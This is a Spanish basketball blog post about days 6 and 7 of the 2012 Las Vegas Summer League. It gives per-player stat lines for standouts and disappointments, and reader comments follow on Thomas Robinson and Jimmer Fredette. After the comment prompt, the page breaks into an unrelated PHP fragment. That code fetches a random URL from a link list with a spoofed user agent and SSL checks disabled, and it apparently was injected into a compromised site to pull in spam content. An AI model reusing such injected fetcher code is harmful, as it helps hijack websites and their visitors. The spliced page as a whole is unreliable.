Las Vegas SummerLeague: Días 6 y 7

16 de July de 2012 por txusma

Ayer faltamos a nuestro repaso diario a los que están dando de sí las SummerLeague pero hoy os ofrecemos ración doble. ¡Qué no se diga!

Destacados

Tony Wroten: Se suponía que Wroten no tiraba bien pero el jugador de los Grizzlies sorprendió a todos con un 2 de 3 en triples y un 5 de 9 en tiros de campo. Al final nos dejó una actuación de 19 puntos, 8 rebotes, 6 asistencias y 2 robos. Brutal!

Jeremy Lamb: Segundo gran partido del ex de Uconn. El sábado dejó 26 puntos y 4 rebotes en un gran partido.

Markieff Morris: Con el fichaje de Scola, Morris dispondrá de menos minutos pero su intención es ponérselo difícil a Gentry. Gran partido el suyo con 21 puntos y 9 rebotes.

Jordan Hamilton: El jugador de 2º año está siendo el más destacado de los Nuggets en esta summerleague. El primer día consiguió 18 puntos y 5 reboetes y el segundo, volvió a hacer 18 puntos pero cogió 7 rebotes.

Dominique Jones: El escolta de 2º año de los Mavs resultó imparable para el contrario. Anotó 32 puntos y capturó 8 rebotes.

Klay Thompson: 17 puntos (4 de 6 en triples), 6 rebotes, 4 asistencias, 2 robos… Esto se le queda algo pequeño.

Cory Joseph: Buen primer partido del jugador de los Spurs. 18 puntos (7 de 11), 5 rebotes y 4 asistencias para el combo-guard. Si De Colo va a la San Antonio se encontrará con competencia.

Damian Lillard: Partidazo del base de los Blazers con 25 puntos, 4 rebotes y 4 asistencias.

A seguir

Harrison Barnes: Anotó 13 puntos pero necesitó 17 lanzamientos.

Evan Fournier: El francés empezó su andadura con 10 puntos y 5 rebotes en 31 minutos de juego. En el 2º partido disputado ayer consiguió 15 puntos (pero con un 4 de 15), 5 rebotes, 2 asistencias y 2 robos.

Thomas Robinson: 14 puntos y 12 rebotes en 27 minutos. El jugador de los Kings tiene pinta de carpanta.

Jimmer Fredette: El ex de Brigham Young necesitó 11 tiros para anotar 15 puntos. El verano se presentaba muy importante para él y no lo está aprovechando.

Terrence Jones: Otra sólida actuación. 16 puntos con un 7 de 8 más 5 rebotes y 2 asistencias.

Bradley Beal: El número 3 del draft se fue a casa con 14 puntos, 5 rebotes y 4 asistencias el sábado y con 20 puntos y 6 rebotes el domingo. La plaza de escolta titular de los Wizards no se le puede escapar.

Ed Davis: ¿Este año sí? 15 puntos y 12 rebotes para el de los Raptors.

Kawhi Leonard: Tras jugar de titular prácticamente todo el año en uno de los mejores equipos de la liga, ¿es necesario que juegue la Summerleague? Pues parece que sí. De momento, 23 puntos en el primer partido.

Dion Waiters: Se estrenó a lo Chris Webber: Pidiendo un tiempo muerto en los segundos finales cuando su equipo no disponía de ellos, con la correspondiente derrota. Nos dejó sólo 10 puntos pero muestras de gran calidad. En ausencia de Irving cogió la responsabilidad en los minutos finales y respondió.

Tyler Zeller: Puntos, rebotes, tapones. Zeller aportó justo lo que se espera de él (15, 7, 2).

Austin Rivers: ¿Crack o bluf? De momento, ni lo uno ni lo otro. 14 puntos (pero con un 3 de 13), 2 asistencias y 3 robos. Hará falta más tiempo para evaluarle.

Meyers Leonard: A pesar de mi alergia a los pívots blancos reconozco que no jugó mal. Acabó el partido con 14 puntos, 11 rebotes y 3 tapones.

Decepciones

Donatas Motiejunas: Si el primer día nos dejó grandes sensaciones, el sábado se quedó en 1 puntos tras fallar los 5 tiros a canasta que intentó. No todos los días son domingo.

Royce White: 2º partido y 2ª decepción. Dicen que es uno de los alero-alapívots con más clase del draft pero de momento no lo está demostrando. Apenas participó en el juego del equipo y se quedó en 4 puntos.

Terrence Ross: Anotó 14 puntos pero necesitó 14 lanzamientos y perdió 5 balones. No se le vio dominar el juego en ningún momento y los Raptors sufrieron mucho por su culpa.

Kemba Walker: Sí, anotó cuando la pelota quemaba pero lo hizo en sólo 2 ocasiones. Falló los otros 12 lanzamientos.

Comenta

9 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Yo vi un ratito el Kings-Lakers del sábado y me dio muy buenas sensaciones Thomas Robinson. Tiene ética de trabajo, conoce el juego, defiende y sabe tapar bien el rebote, además de ser muy rápido en transición y conseguir canastas en el 1×1 con su marca aprovechando su rapidez y potencia para dejar bandejas. Le he visto más problemas en el estático, tendrá dificultades al ser algo pequeño para superar defensas fuertes, le están poniendo bastantes tapones, pero destaca por su lucha y entrega, además de fuerza y corpulencia. Qué pena que no mida 3-4 centímetros más…. también tiene buena mano y creo que puede ser una buena amenaza a 4-5 metros. Es una lástima que tenga altura de alero en la NBA, porque tiene todo para ser un gran ala-pívot. Espero que no le condene su falta de centímetros.

    Y sobre Jimmer… nada nuevo sobre el páramo. No se empana de nada, solo tiene buen tiro, nada más. Parece que cada día entiende peor el juego. Creo que de este chaval no haremos carrera en los Kings…

      Citar

  2. Esteban dice:
    #2

    lillard, otro que trae buena pinta, el mas flojo por posicion, y creo que era de esperarse es waiters… mucho tendra q hacer para no quedar como un grave error

      Citar

  3. Mariano dice:
    #3

    Coincido plenamente con Sancho88.. pude ver el kings lakers y thomas robinson pinta muy bien.. A pesar de haber recibido un par de bloqueos, se mueve bien y además sabe pasar el balon..

      Citar

  4. Esteban dice:
    #4

    robinson tiene la explisividad de lebron, pero le faltan muchos centimetros y algo de peso, para mi sufrira la nba hasta que se haga un fisico tan ancho como el de boozer, sino lo taparan una y otra vez

    ya lo vi muy intimidado ante davis en la final de la NCAA, donde fallo mucho a boca de jarro,

    un dia dije aqui que ni de coña robinson media 2.08 y todos me mataron, vamos que apenas supera los dos metros y no tiene brazos muy largos

    mas alla de todo esto, es una atleta sensacional, va a ser bueno

      Citar

  5. Sancho88 dice:
    #5

    yo he llegado a leer por ahí 2,03… creo que esta altura es mucho más realista que la que le dan por ahí. El poblema es que en casi todos los perfiles aparece como un 6,10”, y eso da lugar a equívocos sobre todo con el cambio al sistema métrico… pero sí, como mucho muchísisisissimo 2,05, pero creo que ni eso. De hecho, es más alto James Johnson. Efectivamente, el otro día tb le pasaba, que a pesar de ganar la posición y tener el tiro claro, frente a la intimidación del rival fallaba bastantes veces… sospecho que le ocurrirá en muchas ocasiones, pero él tiene que aprender a aprovechar sus otras cualidades, como rapidez, fuerza, explosividad… royo Tristan Thompson. Pero T-Rob tiene más defensa, IQ y cualidades ofensivas en cuanto a movimientos, pase, etc. que Tristan, así que le tiene que ir bien por fuerza porque se le ve sacrificado. T-Rob y DMC, ya lo estoy viendo, una pareja que va a trabajar y a poner serios problemas en las defensas rivales.

      Citar

  6. Esteban dice:
    #6

    sisi claro, debera cambiar su estilo, no puede jugar como en la NCAA donde los internos capaces que bloquearlo eran pocos, con esa agilidad puede aprender un buen juego de pies, amagar y retirarse para lanzar un gancho, etc, puede hacerlo,

    y el peso tamb es un problema, me da la sensacion que es tan agil por que esmuy liviano, pero asi no podra marcar a nadie al poste, debera aumentar de peso y puede que pierda movilidad…

      Citar

  7. Sancho88 dice:
    #7

    ejemplo mejor que T Thompson para Robinson: Al Horford. Él es el ejemplo de reconversión para los ala pívots que no sean tan grandes

      Citar

  8. Sancho88 dice:
    #8

    Último comentario del día. Blatche a 0 coma de la aminstía y los rookies de los rockets al completo se han zampado a los Kings. Robinson flojito, 10-8, pero…. ahí va la sorpresa chavalotes… JIMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMEEEEEEEEEER 30 PUNTOOOOOOOOOOOOOOOOS!!!!!! Se ve que se ha calentado el mejor tirador del mundo… jejejej. Algo es cierto, al menos el chaval le pone ganas ahora porque es su última oportunidad. Claro que ha jugado de base frente al rastaman Fortson… tampoco era aquello Derrick Rose precisamente… Montiejungas, White, Jones, Lamb…. todos rindiendo. Morley hizo unos picks en el draft sensacionales. Algunos de estos van a rendir más que algunos top 10

      Citar

  9. Esteban dice:
    #9

    Cierto sancho, donatas era un top 10 el año pasado si no tendria q haber esperado un año y lamb ya lo he dicho varias veces, tiene pinta q en unos años sera de los mejores. 3 o 5 de este draft

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>